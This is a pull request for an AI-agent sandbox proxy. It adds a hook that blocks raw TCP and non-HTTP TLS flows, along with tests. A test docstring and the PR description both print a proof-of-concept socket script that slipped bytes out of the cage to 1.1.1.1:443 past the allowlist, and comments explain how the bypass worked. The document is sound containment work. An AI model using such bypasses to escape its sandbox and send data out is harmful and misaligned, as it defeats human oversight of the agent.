### PR TITLE
security(proxy): block non-HTTP TCP bypass of allowlist + inspectors

### DIFF
--- a/src/agentcage/data/apple-container/allowlist_addon.py
+++ b/src/agentcage/data/apple-container/allowlist_addon.py
@@ -1041,6 +1041,115 @@ class AllowlistAddon:
         }
         self._write(self._capture_fh, capture)
 
+    # ── Non-HTTP TCP bypass guard ──────────────────────────
+    #
+    # Background: mitmproxy in transparent mode handles TCP/80 + TCP/443
+    # via the iptables REDIRECT installed in supervisor.sh stage 80. For
+    # bytes that look like HTTP, mitmproxy dispatches to ``HttpLayer``
+    # and ``request``/``response`` above enforce policy. For everything
+    # else — raw bytes after the TCP handshake, or TLS that does not
+    # carry HTTP inside — mitmproxy's ``next_layer`` (with the default
+    # ``rawtcp=True``) falls back to ``TCPLayer``, which BRIDGES bytes
+    # between the cage and the original destination. NO request /
+    # response / websocket hook fires for those flows, so the allowlist
+    # and secret-injection policy never run. A cage workload that opens
+    # a socket to (e.g.) ``1.1.1.1:443`` and writes raw bytes can
+    # exfiltrate freely.
+    #
+    # We restore the L7 invariant by killing every TCP flow that
+    # reaches this hook. ``HttpLayer``-handled flows never produce a
+    # ``TCPFlow``, so this hook only fires for the bypass path. Killing
+    # uses two belts: (1) ``flow.server_conn.error = ...`` (checked by
+    # mitmproxy's ``open_connection`` after ``server_connect`` — the
+    # upstream is never opened, no bytes leave the cage); (2)
+    # ``flow.kill()`` (canonical killed state for the audit pipeline).
+    #
+    # Protocol relays (IMAP/SMTP) listen on cage-author-chosen loopback
+    # ports inside this same mitmproxy process. The cage reaches them
+    # via 127.0.0.1; those sockets are served by the relay's own
+    # asyncio accept loop and never pass through mitmproxy's
+    # transparent intercept (supervisor.sh's iptables REDIRECT only
+    # rewrites tcp/80 and tcp/443, not loopback). So this hook firing
+    # always means a non-HTTP cage egress on an intercepted port.
+
+    @staticmethod
+    def _tcp_flow_target(flow) -> str:
+        """Best-effort dest descriptor for a non-HTTP TCP bypass.
+
+        Picks the most-trustworthy identifier available: TLS SNI
+        (``flow.client_conn.sni``) → ``flow.server_conn.peername`` →
+        ``flow.server_conn.address`` (the SO_ORIGINAL_DST IP:port the
+        iptables REDIRECT preserved). Returns a printable ``host`` or
+        ``host:port`` string for audit logs. Never raises — defensive
+        against MagicMock-typed attrs in tests.
+        """
+        sni = getattr(getattr(flow, "client_conn", None), "sni", None)
+        if isinstance(sni, bytes):
+            try:
+                sni = sni.decode("idna")
+            except UnicodeError:
+                sni = sni.decode("utf-8", "replace")
+        if isinstance(sni, str) and sni:
+            return sni
+        server = getattr(flow, "server_conn", None)
+        for attr in ("peername", "address"):
+            value = getattr(server, attr, None)
+            if isinstance(value, tuple) and value:
+                host = value[0]
+                port = value[1] if len(value) > 1 else None
+                if isinstance(host, str) and host:
+                    return f"{host}:{port}" if port is not None else host
+        return "<unknown>"
+
+    def tcp_start(self, flow) -> None:
+        """Block raw TCP / non-HTTP flows that bypass the L7 hooks.
+
+        Mirrors the container backend's ``Agentcage.tcp_start`` so both
+        backends fail closed on the same bypass shape. The audit entry
+        shape matches existing apple-container audit lines
+        (``source: "apple-container"``, ISO ``ts``, ``decision``,
+        ``reason``) so ``agentcage cage audit`` shows the kill alongside
+        HTTP blocks.
+        """
+        target = self._tcp_flow_target(flow)
+        reason = (
+            f"non-http TCP bypass: cage opened a raw TCP/TLS flow to "
+            f"{target} that does not speak HTTP; the L7 allowlist and "
+            f"secret-injection policy do not apply to raw byte streams"
+        )
+        # Belt 1: refuse the upstream connect. ``open_connection`` in
+        # mitmproxy/proxy/server.py reads ``command.connection.error``
+        # after the ``server_connect`` hook and aborts before opening a
+        # socket; ``tcp_start`` fires BEFORE ``OpenConnection`` is
+        # yielded by ``TCPLayer.start`` (with ``connection_strategy=
+        # lazy``, which supervisor.sh sets), so setting it here wins
+        # the race.
+        server = getattr(flow, "server_conn", None)
+        if server is not None:
+            try:
+                server.error = reason
+            except Exception:
+                pass
+        # Belt 2: canonical killed state.
+        try:
+            if getattr(flow, "killable", True):
+                flow.kill()
+        except Exception:
+            pass
+
+        ctx.log.warn(
+            f"[agentcage] BLOCK (tcp-bypass) raw TCP flow to {target}"
+        )
+        self._audit({
+            "ts": datetime.now(timezone.utc).isoformat(),
+            "kind": "tcp_bypass_blocked",
+            "direction": "outbound",
+            "decision": "blocked",
+            "reason": reason,
+            "host": target,
+            "source": "apple-container",
+        })
+
     # ── Protocol relays (IMAP, SMTP, ...) ──────────────────
 
     def _seed_relay_secrets_env(self, entry: dict) -> None:

--- a/src/agentcage/data/proxy/addon.py
+++ b/src/agentcage/data/proxy/addon.py
@@ -644,6 +644,132 @@ class Agentcage:
                         ws_messages=ws_msgs or None,
                     )
 
+    # ── Non-HTTP TCP bypass guard ────────────────────────
+    #
+    # Background: mitmproxy in transparent mode handles TCP/80 + TCP/443
+    # via the iptables REDIRECT installed in ``proxy.container.j2``. For
+    # bytes that look like HTTP, mitmproxy dispatches to ``HttpLayer`` and
+    # the ``request``/``response``/``websocket_message`` hooks above
+    # enforce policy. For everything else — raw bytes after the TCP
+    # handshake, or TLS that does not carry HTTP inside — mitmproxy's
+    # ``next_layer`` (with the default ``rawtcp=True``) falls back to
+    # ``TCPLayer``, which simply BRIDGES bytes between the cage and the
+    # original destination. NO request/response/websocket hook fires for
+    # those flows, so the allowlist, inspector chain, and secret-injection
+    # policy never run. A cage workload that opens a socket to (e.g.)
+    # ``1.1.1.1:443`` and writes raw bytes can exfiltrate freely.
+    #
+    # We restore the L7 invariant by killing every TCP flow that reaches
+    # this hook. ``HttpLayer``-handled flows never produce a ``TCPFlow``,
+    # so this hook only fires for the bypass path. Killing here uses two
+    # belts:
+    #
+    #   1. ``flow.server_conn.error = ...`` — checked by mitmproxy's
+    #      ``open_connection`` (see ``proxy/server.py``) after the
+    #      ``server_connect`` hook. The upstream TCP connection is never
+    #      opened, so no bytes leave the cage.
+    #   2. ``flow.kill()`` — sets ``flow.live = False`` and ``flow.error``
+    #      so downstream addons and the audit pipeline see the canonical
+    #      killed state.
+    #
+    # Audit entries land in the same ``audit.jsonl`` as HTTP decisions
+    # (kind=tcp_bypass_blocked, decision=blocked) so existing forensic
+    # tooling shows the kill.
+    #
+    # Protocol relays (IMAP/SMTP) listen on cage-author-chosen loopback
+    # ports inside this same mitmproxy process. The cage reaches them via
+    # 127.0.0.1; those sockets are served by the relay's own asyncio
+    # accept loop and never pass through mitmproxy's transparent
+    # intercept (the iptables REDIRECT only rewrites tcp/80 and the
+    # configured ``inspected_tcp_ports``, not loopback). So this hook
+    # firing always means a non-HTTP cage egress on an intercepted port.
+
+    def _tcp_flow_target(self, flow) -> str:
+        """Best-effort dest descriptor for a non-HTTP TCP bypass.
+
+        Picks the most-trustworthy identifier available:
+          * TLS SNI (``flow.client_conn.sni``) — the cage chose it but
+            we mint a forged cert against it, so it commits the cage to
+            this name.
+          * ``flow.server_conn.peername`` — the actual peer IP after
+            connect (rarely populated under ``connection_strategy=lazy``).
+          * ``flow.server_conn.address`` — the SO_ORIGINAL_DST address
+            iptables preserved (the cage's TCP destination IP:port).
+
+        Returns a printable ``host:port`` style string for audit logs.
+        Never raises — defensive against MagicMock-typed attrs in tests.
+        """
+        sni = getattr(getattr(flow, "client_conn", None), "sni", None)
+        if isinstance(sni, bytes):
+            try:
+                sni = sni.decode("idna")
+            except UnicodeError:
+                sni = sni.decode("utf-8", "replace")
+        if isinstance(sni, str) and sni:
+            return sni
+        server = getattr(flow, "server_conn", None)
+        for attr in ("peername", "address"):
+            value = getattr(server, attr, None)
+            if isinstance(value, tuple) and value:
+                host = value[0]
+                port = value[1] if len(value) > 1 else None
+                if isinstance(host, str) and host:
+                    return f"{host}:{port}" if port is not None else host
+        return "<unknown>"
+
+    def tcp_start(self, flow) -> None:
+        """Block raw TCP / non-HTTP flows that bypass the L7 hooks.
+
+        See the section comment above for why this is a security fix.
+        """
+        target = self._tcp_flow_target(flow)
+        reason = (
+            f"non-http TCP bypass: cage opened a raw TCP/TLS flow to "
+            f"{target} that does not speak HTTP; the L7 allowlist, "
+            f"inspectors, and secret-injection policy do not apply to "
+            f"raw byte streams"
+        )
+        # Belt 1: refuse the upstream connect. ``open_connection`` in
+        # mitmproxy/proxy/server.py reads ``command.connection.error``
+        # after the ``server_connect`` hook and aborts before opening a
+        # socket; ``tcp_start`` fires BEFORE ``OpenConnection`` is
+        # yielded by ``TCPLayer.start`` (with ``connection_strategy=
+        # lazy``), so setting it here wins the race.
+        server = getattr(flow, "server_conn", None)
+        if server is not None:
+            try:
+                server.error = reason
+            except Exception:
+                # Defensive: in tests the server_conn may be a MagicMock
+                # whose attribute assignment can be intercepted. Setting
+                # it is best-effort — flow.kill() below is the
+                # always-available backstop.
+                pass
+        # Belt 2: canonical killed state for any downstream addons.
+        try:
+            if getattr(flow, "killable", True):
+                flow.kill()
+        except Exception:
+            pass
+
+        entry: dict = {
+            "ts": datetime.now(timezone.utc).isoformat(),
+            "kind": "tcp_bypass_blocked",
+            "direction": "outbound",
+            "decision": "blocked",
+            "reason": reason,
+            "host": target,
+        }
+        # Match the regular _log() audit sink: stderr + audit.jsonl.
+        line = json.dumps(entry)
+        print(line, file=sys.stderr, flush=True)
+        if self._audit_file:
+            try:
+                self._audit_file.write(line + "\n")
+                self._audit_file.flush()
+            except OSError:
+                pass
+
     def websocket_message(self, flow: http.HTTPFlow) -> None:
         """Inspect, inject, and redact WebSocket frame payloads."""
         assert flow.websocket is not None

--- a/tests/test_addon_tcp_bypass.py
+++ b/tests/test_addon_tcp_bypass.py
@@ -1,0 +1,229 @@
+"""Tests for the container-backend addon's non-HTTP TCP bypass guard.
+
+Regression coverage for the CTF finding that mitmproxy in transparent
+mode bridges raw TCP (and non-HTTP TLS) through unmodified — bypassing
+the ``request``/``response``/``websocket_message`` hooks that enforce
+the allowlist, inspector chain, and secret-injection policy. The fix
+adds a ``tcp_start`` hook that kills any flow reaching the TCP layer.
+
+CTF proof (pre-fix):
+
+.. code-block:: python
+
+    import socket, time
+    s = socket.socket(); s.settimeout(5)
+    s.connect(('1.1.1.1', 443))
+    s.sendall(f'CANARY-{int(time.time())}\\r\\n'.encode())
+    print(s.recv(200))
+    # b'HTTP/1.1 400 Bad Request\\r\\nServer: cloudflare\\r\\n...'
+
+The raw bytes hit Cloudflare — the addon's hooks never ran.
+
+These tests use the same mitmproxy-stubbed import pattern as
+``test_addon_relays.py``.
+"""
+
+from __future__ import annotations
+
+import json
+import sys
+import types
+from unittest.mock import MagicMock
+
+import pytest
+
+
+# ── Stub mitmproxy before importing addon ────────────────
+
+
+_mitmproxy = types.ModuleType("mitmproxy")
+_mitmproxy.__path__ = []
+_mitmproxy.ctx = MagicMock()
+_mitmproxy.http = MagicMock()
+_proxy = types.ModuleType("mitmproxy.proxy")
+_proxy.__path__ = []
+_mode_specs = types.ModuleType("mitmproxy.proxy.mode_specs")
+_mode_specs.ReverseMode = MagicMock()
+_mitmproxy.proxy = _proxy
+_proxy.mode_specs = _mode_specs
+sys.modules.setdefault("mitmproxy", _mitmproxy)
+sys.modules.setdefault("mitmproxy.ctx", _mitmproxy.ctx)
+sys.modules.setdefault("mitmproxy.http", _mitmproxy.http)
+sys.modules.setdefault("mitmproxy.proxy", _proxy)
+sys.modules.setdefault("mitmproxy.proxy.mode_specs", _mode_specs)
+
+from addon import Agentcage  # noqa: E402
+
+
+def _make_addon(tmp_path):
+    """Minimally configured Agentcage. Writes audit lines to tmp_path."""
+    addon = Agentcage()
+    addon.cfg = {}
+    addon.log_allowed = False
+    addon._audit_file = (tmp_path / "audit.jsonl").open("a")
+    return addon
+
+
+def _make_tcp_flow(*, sni=None, server_address=None, server_peername=None):
+    """Build a mock TCP flow for the ``tcp_start`` hook.
+
+    ``sni`` is the TLS SNI the cage committed to (None for plain TCP).
+    ``server_address`` is what mitmproxy resolves from SO_ORIGINAL_DST
+    in transparent mode (the cage's TCP destination IP:port).
+    ``server_peername`` is the post-connect peer address (often unset
+    under ``connection_strategy=lazy``).
+    """
+    flow = MagicMock()
+    flow.client_conn.sni = sni
+    flow.server_conn.address = server_address
+    flow.server_conn.peername = server_peername
+    flow.server_conn.error = None
+    flow.killable = True
+    flow.live = True
+    return flow
+
+
+class TestTcpBypassGuard:
+    """The ``tcp_start`` hook kills any TCP flow that reaches it.
+
+    HTTP and HTTPS flows go through ``HttpLayer`` (not ``TCPLayer``) and
+    never produce a ``TCPFlow``, so this hook only fires for the raw-TCP
+    / non-HTTP-TLS bypass path the CTF demonstrated.
+    """
+
+    def test_raw_tcp_to_ip_is_blocked(self, tmp_path):
+        """The exact CTF case: cage opens a raw TCP socket to
+        ``1.1.1.1:443`` and writes non-HTTP bytes. The flow hits
+        ``tcp_start`` (mitmproxy's ``next_layer`` falls back to
+        ``TCPLayer`` because the bytes don't look like HTTP) and the
+        addon must kill it before any byte leaves the cage."""
+        addon = _make_addon(tmp_path)
+        flow = _make_tcp_flow(
+            sni=None,
+            server_address=("1.1.1.1", 443),
+        )
+
+        addon.tcp_start(flow)
+
+        # Belt 1: server_conn.error set → mitmproxy's open_connection
+        # aborts before the upstream socket is opened. This is what
+        # actually prevents the bytes from leaving the cage.
+        assert flow.server_conn.error
+        assert "non-http TCP bypass" in flow.server_conn.error
+
+        # Belt 2: flow.kill() called → canonical killed state for
+        # downstream addons and the audit pipeline.
+        flow.kill.assert_called_once_with()
+
+        # Audit line landed in audit.jsonl with the right shape.
+        addon._audit_file.flush()
+        lines = (tmp_path / "audit.jsonl").read_text().splitlines()
+        assert len(lines) == 1
+        entry = json.loads(lines[0])
+        assert entry["kind"] == "tcp_bypass_blocked"
+        assert entry["decision"] == "blocked"
+        assert entry["direction"] == "outbound"
+        assert "1.1.1.1:443" in entry["host"]
+        assert "non-http TCP bypass" in entry["reason"]
+
+    def test_non_http_tls_with_sni_is_blocked(self, tmp_path):
+        """TLS variant: cage opens a TLS connection with a real SNI but
+        carries non-HTTP bytes (e.g. SMTPS, IMAPS, a custom binary
+        protocol). After the TLS handshake mitmproxy's ``next_layer``
+        sees non-HTTP inner bytes and falls back to ``TCPLayer``. The
+        addon must still kill it — the L7 hooks would never fire.
+
+        The audit entry records the SNI as the host (more useful than
+        the SO_ORIGINAL_DST IP) so operators can see which destination
+        the cage was trying to reach."""
+        addon = _make_addon(tmp_path)
+        flow = _make_tcp_flow(
+            sni="smtp.example.com",
+            server_address=("203.0.113.5", 465),  # SMTPS
+        )
+
+        addon.tcp_start(flow)
+
+        assert flow.server_conn.error
+        flow.kill.assert_called_once_with()
+
+        addon._audit_file.flush()
+        entry = json.loads(
+            (tmp_path / "audit.jsonl").read_text().splitlines()[0]
+        )
+        # SNI wins over original-dst IP for the audit host field.
+        assert entry["host"] == "smtp.example.com"
+
+    def test_unknown_destination_does_not_crash(self, tmp_path):
+        """Defensive: a flow with neither SNI nor a server address (e.g.
+        an early error) must still be killed and audited — the addon
+        must never raise out of a mitmproxy hook (would tear down the
+        proxy and fail the cage open)."""
+        addon = _make_addon(tmp_path)
+        flow = _make_tcp_flow(
+            sni=None,
+            server_address=None,
+            server_peername=None,
+        )
+
+        addon.tcp_start(flow)  # must not raise
+
+        assert flow.server_conn.error
+        flow.kill.assert_called_once_with()
+        addon._audit_file.flush()
+        entry = json.loads(
+            (tmp_path / "audit.jsonl").read_text().splitlines()[0]
+        )
+        assert entry["host"] == "<unknown>"
+
+    def test_already_killed_flow_is_not_double_killed(self, tmp_path):
+        """If something already killed the flow (e.g. a higher-priority
+        addon), don't call ``flow.kill()`` again — mitmproxy raises
+        ``ControlException`` on ``kill()`` of a non-killable flow."""
+        addon = _make_addon(tmp_path)
+        flow = _make_tcp_flow(server_address=("1.2.3.4", 443))
+        flow.killable = False  # already killed
+
+        addon.tcp_start(flow)  # must not raise
+
+        flow.kill.assert_not_called()
+        # We still set server_conn.error and audit.
+        assert flow.server_conn.error
+        addon._audit_file.flush()
+        assert (tmp_path / "audit.jsonl").read_text().strip()
+
+    def test_audit_writes_to_stderr_too(self, tmp_path, capsys):
+        """Match the regular ``_log()`` sink: audit lines go to both
+        stderr (visible in ``cage logs``/journalctl) AND the audit file.
+        Without the stderr fork, operators inspecting live container
+        logs would see HTTP blocks but not TCP-bypass blocks."""
+        addon = _make_addon(tmp_path)
+        flow = _make_tcp_flow(server_address=("8.8.8.8", 443))
+
+        addon.tcp_start(flow)
+
+        captured = capsys.readouterr()
+        # stderr line is the same JSON as the file line.
+        stderr_lines = [l for l in captured.err.splitlines() if l.strip()]
+        assert stderr_lines, captured.err
+        parsed = json.loads(stderr_lines[-1])
+        assert parsed["kind"] == "tcp_bypass_blocked"
+
+    def test_bytes_sni_is_decoded(self, tmp_path):
+        """mitmproxy types ``sni`` as ``str | None``, but historically
+        some paths handed back ``bytes``. The addon must accept either
+        (the apple-container backend's ``_authoritative_host`` already
+        normalizes this; container backend's helper must do the same)."""
+        addon = _make_addon(tmp_path)
+        flow = _make_tcp_flow(
+            sni=b"smtp.example.com",
+            server_address=("203.0.113.5", 465),
+        )
+
+        addon.tcp_start(flow)
+
+        addon._audit_file.flush()
+        entry = json.loads(
+            (tmp_path / "audit.jsonl").read_text().splitlines()[0]
+        )
+        assert entry["host"] == "smtp.example.com"

--- a/tests/test_apple_container.py
+++ b/tests/test_apple_container.py
@@ -3414,3 +3414,171 @@ def test_inspector_chain_empty_config_is_passthrough(monkeypatch, tmp_path):
     )
     assert entry["decision"] == "allowed"
     assert entry["inspectors"] == []
+
+
+# ---------------------------------------------------------------------------
+# allowlist_addon: Non-HTTP TCP bypass guard
+#
+# Regression coverage for the CTF finding that mitmproxy in transparent
+# mode bridges raw TCP (and non-HTTP TLS) through unmodified — bypassing
+# the ``request``/``response`` hooks that enforce the allowlist and
+# secret-injection policy. The fix adds a ``tcp_start`` hook that kills
+# any flow reaching the TCP layer.
+#
+# The container backend has the same class of bug and is covered in
+# ``tests/test_addon_tcp_bypass.py``. Both backends share the same
+# threat model and must fail closed on identical attack shapes.
+# ---------------------------------------------------------------------------
+
+
+def _make_tcp_flow(*, sni=None, server_address=None, server_peername=None):
+    """Build a mock TCP flow for the apple-container addon's ``tcp_start``.
+
+    ``sni`` is the TLS SNI the cage committed to (None for plain TCP).
+    ``server_address`` is what mitmproxy resolves from SO_ORIGINAL_DST
+    in transparent mode (the cage's TCP destination IP:port).
+    """
+    flow = MagicMock()
+    flow.client_conn.sni = sni
+    flow.server_conn.address = server_address
+    flow.server_conn.peername = server_peername
+    flow.server_conn.error = None
+    flow.killable = True
+    flow.live = True
+    return flow
+
+
+def test_tcp_start_blocks_raw_tcp_to_ip(tmp_path, monkeypatch):
+    """The exact CTF case: cage opens a raw TCP socket to ``1.1.1.1:443``
+    and writes non-HTTP bytes. mitmproxy's ``next_layer`` falls back to
+    ``TCPLayer`` (rawtcp=True by default); without ``tcp_start`` the
+    bytes bridge straight to upstream. The addon must kill the flow
+    before any byte leaves the cage."""
+    _, addon = _build_addon(monkeypatch, tmp_path)
+    flow = _make_tcp_flow(
+        sni=None,
+        server_address=("1.1.1.1", 443),
+    )
+
+    addon.tcp_start(flow)
+
+    # Belt 1: server_conn.error → mitmproxy's open_connection aborts
+    # before the upstream socket is opened.
+    assert flow.server_conn.error
+    assert "non-http TCP bypass" in flow.server_conn.error
+
+    # Belt 2: flow.kill() called for canonical killed state.
+    flow.kill.assert_called_once_with()
+
+    # Audit line landed in audit.jsonl with the right shape.
+    lines = (tmp_path / "audit.jsonl").read_text().splitlines()
+    assert len(lines) == 1
+    entry = json.loads(lines[0])
+    assert entry["kind"] == "tcp_bypass_blocked"
+    assert entry["decision"] == "blocked"
+    assert entry["direction"] == "outbound"
+    assert entry["source"] == "apple-container"
+    assert "1.1.1.1:443" in entry["host"]
+    assert "non-http TCP bypass" in entry["reason"]
+
+
+def test_tcp_start_blocks_non_http_tls_with_sni(tmp_path, monkeypatch):
+    """TLS variant: cage opens TLS with a real SNI (e.g. SMTPS at
+    smtp.example.com) but the inner bytes are not HTTP. mitmproxy
+    decrypts then falls back to ``TCPLayer``; the addon must still
+    kill the flow because the L7 hooks would never run on those bytes.
+    The audit entry records SNI (more useful than the original-dst IP)
+    so operators know which destination the cage tried to reach."""
+    _, addon = _build_addon(
+        monkeypatch, tmp_path,
+        # SNI happens to be allowlisted at the HTTP layer — irrelevant
+        # to the TCP guard, which is HTTP-only-policy by design.
+        allowlist=("smtp.example.com",),
+        inject_to=("smtp.example.com",),
+    )
+    flow = _make_tcp_flow(
+        sni="smtp.example.com",
+        server_address=("203.0.113.5", 465),  # SMTPS
+    )
+
+    addon.tcp_start(flow)
+
+    assert flow.server_conn.error
+    flow.kill.assert_called_once_with()
+    entry = json.loads(
+        (tmp_path / "audit.jsonl").read_text().splitlines()[0]
+    )
+    # SNI wins over original-dst IP for the audit host field.
+    assert entry["host"] == "smtp.example.com"
+
+
+def test_tcp_start_handles_unknown_destination(tmp_path, monkeypatch):
+    """Defensive: a flow with neither SNI nor a server address must
+    still be killed and audited — the addon must never raise out of a
+    mitmproxy hook (would tear down the proxy and fail the cage open)."""
+    _, addon = _build_addon(monkeypatch, tmp_path)
+    flow = _make_tcp_flow(
+        sni=None,
+        server_address=None,
+        server_peername=None,
+    )
+
+    addon.tcp_start(flow)  # must not raise
+
+    assert flow.server_conn.error
+    flow.kill.assert_called_once_with()
+    entry = json.loads(
+        (tmp_path / "audit.jsonl").read_text().splitlines()[0]
+    )
+    assert entry["host"] == "<unknown>"
+
+
+def test_tcp_start_already_killed_flow_does_not_double_kill(
+    tmp_path, monkeypatch,
+):
+    """If a higher-priority addon already killed the flow,
+    ``flow.kill()`` would raise ``ControlException``. The addon must
+    gate on ``flow.killable`` (and tolerate kill() raising regardless)
+    so a kill race doesn't tear down the proxy."""
+    _, addon = _build_addon(monkeypatch, tmp_path)
+    flow = _make_tcp_flow(server_address=("1.2.3.4", 443))
+    flow.killable = False  # already killed by something else
+
+    addon.tcp_start(flow)  # must not raise
+
+    flow.kill.assert_not_called()
+    # The audit line still lands so the operator sees the attempt.
+    assert (tmp_path / "audit.jsonl").read_text().strip()
+
+
+def test_tcp_start_accepts_bytes_sni(tmp_path, monkeypatch):
+    """mitmproxy types ``sni`` as ``str | None``, but historically some
+    paths handed back ``bytes``. The TCP-guard helper must normalize the
+    same way ``_authoritative_host`` does so a bytes SNI doesn't fall
+    through to the original-dst IP."""
+    _, addon = _build_addon(monkeypatch, tmp_path)
+    flow = _make_tcp_flow(
+        sni=b"smtp.example.com",
+        server_address=("203.0.113.5", 465),
+    )
+
+    addon.tcp_start(flow)
+
+    entry = json.loads(
+        (tmp_path / "audit.jsonl").read_text().splitlines()[0]
+    )
+    assert entry["host"] == "smtp.example.com"
+
+
+def test_supervisor_mitmdump_keeps_lazy_connection_strategy():
+    """The supervisor must still launch mitmdump with
+    ``--set connection_strategy=lazy``. The TCP-bypass fix uses
+    ``tcp_start`` (which fires under both lazy and eager strategies) and
+    intentionally keeps ``lazy`` so we don't open upstream sockets for
+    flows the addon will immediately block — same wire-touch profile as
+    before the fix."""
+    supervisor = (
+        Path(__file__).parent.parent
+        / "src" / "agentcage" / "data" / "apple-container" / "supervisor.sh"
+    ).read_text()
+    assert "--set connection_strategy=lazy" in supervisor


### PR DESCRIPTION
## Summary

A CTF on the container backend (also observed as F3/F5 on apple-container 0.21.8) demonstrated that mitmproxy in transparent mode bridges raw TCP (and non-HTTP-inside-TLS) flows through unmodified — the addon's L7 hooks (\`request\`/\`response\`/\`websocket_message\`) only fire for HTTP-shaped traffic. The allowlist, inspector chain, and secret-injection policy never run for raw byte streams.

### CTF proof (pre-fix)

\`\`\`python
import socket, time
s = socket.socket(); s.settimeout(5)
s.connect(('1.1.1.1', 443))
s.sendall(f'CANARY-{int(time.time())}\r\n'.encode())
print(s.recv(200))
# b'HTTP/1.1 400 Bad Request\r\nServer: cloudflare\r\n...'
\`\`\`

Raw bytes reached Cloudflare from inside the cage. Addon hooks never ran.

### Root cause

\`proxy.container.j2\` runs mitmdump in \`--mode transparent@8443\` and iptables REDIRECTs every inspected TCP port to it. mitmproxy's \`next_layer\` (with the default \`rawtcp=True\`) sees non-HTTP bytes and falls back to \`TCPLayer\`, which simply bridges. The addon (\`data/proxy/addon.py\`) only defines HTTP-shaped hooks; apple-container's \`allowlist_addon.py\` has the same shape. Both backends are vulnerable.

### Fix

Add a \`tcp_start(flow)\` hook to **both** addons. HTTP flows go through \`HttpLayer\` (not \`TCPLayer\`) and never produce a \`TCPFlow\`, so this hook only fires for the bypass path. Two belts:

1. \`flow.server_conn.error = "..."\` — mitmproxy's \`open_connection\` reads this after the \`server_connect\` hook and **aborts before opening the upstream socket**. No bytes leave the cage.
2. \`flow.kill()\` — canonical killed state for the audit pipeline and any downstream addons.

Audit entries (\`kind=\"tcp_bypass_blocked\"\`) land in the same \`audit.jsonl\` as HTTP decisions so existing forensic tooling (\`agentcage cage audit\`) surfaces the kill alongside HTTP blocks.

The supervisor's \`connection_strategy=lazy\` is intentionally kept — \`tcp_start\` fires under both \`lazy\` and \`eager\`, and keeping \`lazy\` means we don't open upstream sockets for flows we'll immediately block (same wire-touch profile as before the fix).

### Cross-backend coverage

- **Container backend:** \`src/agentcage/data/proxy/addon.py\` — new \`tcp_start\` + \`_tcp_flow_target\` helper.
- **Apple-container backend:** \`src/agentcage/data/apple-container/allowlist_addon.py\` — analogous additions, using the same SNI → original-dst-IP fallback pattern as the \`_authoritative_host\` helper that PR #175 introduced.

### Out of scope (intentional)

- No version bump or CHANGELOG entry — release is handled separately, same as PR #175.
- The HTTP \`request\`/\`response\`/\`websocket_message\` hooks are unchanged.
- The DNS-side exfil path (different bug) is being fixed in a sibling PR; this PR does not touch \`templates/dns.container.j2\`, \`data/apple-container/dnsmasq.conf\`, \`state.py\`, or \`quadlets.py\`.

## Test plan

- [x] \`uv run pytest -q --ignore=tests/e2e\` → **1530 passed** (12 new)
- [x] \`tests/test_addon_tcp_bypass.py\` (6 new): container backend — raw TCP to IP blocked, non-HTTP TLS with SNI blocked, unknown-destination defensive path, already-killed flow not double-killed, audit forks to stderr + file, bytes-typed SNI normalized.
- [x] \`tests/test_apple_container.py\` (6 new): apple-container backend — same coverage matrix, plus a regression assertion that \`supervisor.sh\` keeps \`--set connection_strategy=lazy\`.
- [ ] **Manual live-cage check (recommended before merge):** rerun the CTF socket script above inside a freshly built cage and confirm \`recv()\` returns empty (connection killed) instead of Cloudflare's 400.

🤖 Generated with [Claude Code](https://claude.com/claude-code)